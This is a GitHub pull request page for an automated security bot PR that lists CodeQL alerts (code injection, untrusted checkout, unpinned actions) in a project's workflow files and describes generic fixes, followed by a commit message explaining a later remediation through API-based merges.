Skip to content

🔒 Security Auto-Fix: CodeQL Alerts#47

Closed
xaostech-security[bot] wants to merge 1 commit intomainfrom
security/autofix-1771725171
Closed

🔒 Security Auto-Fix: CodeQL Alerts#47
xaostech-security[bot] wants to merge 1 commit intomainfrom
security/autofix-1771725171

Conversation

@xaostech-security
Copy link
Contributor

@xaostech-security xaostech-security bot commented Feb 22, 2026

Automated Security Fixes

This PR contains automatic fixes for security alerts detected by CodeQL.

Alerts Addressed:

  • [ERROR] actions/untrusted-checkout/high: .github/workflows/automerge.yml:266
  • [ERROR] actions/untrusted-checkout/high: .github/workflows/automerge.yml:235
  • [WARNING] actions/code-injection/medium: .github/workflows/validate-pr.yml:75
  • [WARNING] actions/code-injection/medium: .github/workflows/validate-pr.yml:74
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:145
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:144
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:142
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:141
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:140
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:139
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:138
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:137
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:136
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:143
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:143
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:113
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:106
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:102
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:108
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:101
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:103
  • [WARNING] actions/unpinned-tag: .github/workflows/central-loader.yml:234
  • [WARNING] actions/unpinned-tag: .github/workflows/test.yml:47
  • [WARNING] actions/unpinned-tag: .github/workflows/bash-lint-advanced.yml:173
  • [ERROR] actions/untrusted-checkout/high: .github/workflows/automerge.yml:135

Changes Made:

  • Extract GitHub Actions context variables to environment variables
  • Pin unpinned third-party actions to commit SHAs
  • Quote shell variables to prevent code injection

Verification Needed:
Review required - validate that fixes don't break workflow functionality

Auto-generated by security-autofix workflow

@xaostech-security xaostech-security bot added security Security-related changes automated Automated changes labels Feb 22, 2026
This was referenced Feb 22, 2026
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
@xaos-bot xaos-bot closed this Feb 22, 2026
This was referenced Feb 22, 2026
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
Closed
This was referenced Feb 22, 2026
Closed
Closed
Closed
Closed
Closed
xaoscience added a commit that referenced this pull request Feb 22, 2026
@xaoscience
security: fix untrusted-checkout vulnerabilities in automerge workflow
c8470aa 
Replace git-based merge operations with GitHub API merge to eliminate
code injection risks. Follows GitHub Security Lab zero-trust pattern:
privileged workflows must never checkout untrusted PR code.

Changes:
- Merge PR from workflow_run: Use github.rest.pulls.merge() API
- Merge PRs from manual/anglicise: Use github.rest.pulls.merge() API
- Remove GPG signing requirement (API doesn't support custom signatures)
- Remove redundant API fallback step (all merges now use API)
- Remove git fetch/merge operations that accessed untrusted PR refs

Fixes CodeQL alerts #47, #50 (untrusted-checkout/high)
Alert #8 appears to be false positive - guard job never checks out PR code

Addresses issue #95
@xaoscience xaoscience deleted the security/autofix-1771725171 branch February 23, 2026 19:08
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

automated Automated changes security Security-related changes

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@xaos-bot